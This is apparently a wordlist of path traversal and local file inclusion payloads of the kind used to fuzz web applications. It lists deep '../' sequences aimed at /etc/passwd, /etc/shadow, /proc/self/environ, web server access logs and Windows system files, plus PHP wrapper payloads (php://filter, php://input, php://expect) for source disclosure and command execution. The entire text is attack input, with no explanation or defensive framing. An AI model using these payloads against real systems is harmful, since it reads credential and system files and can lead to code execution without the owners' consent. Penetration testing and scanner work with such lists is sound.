../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../../../../../etc/group
../../../../../../../../../../../../../../../../etc/hosts
../../../../../../../../../../../../../../../../var/log/apache2/access.log
../../../../../../../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../proc/self/cmdline
php://filter/read=convert.base64-encode/resource=index.php
php://input
php://expect

# Windows
../../../../../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../../../../../windows/win.ini
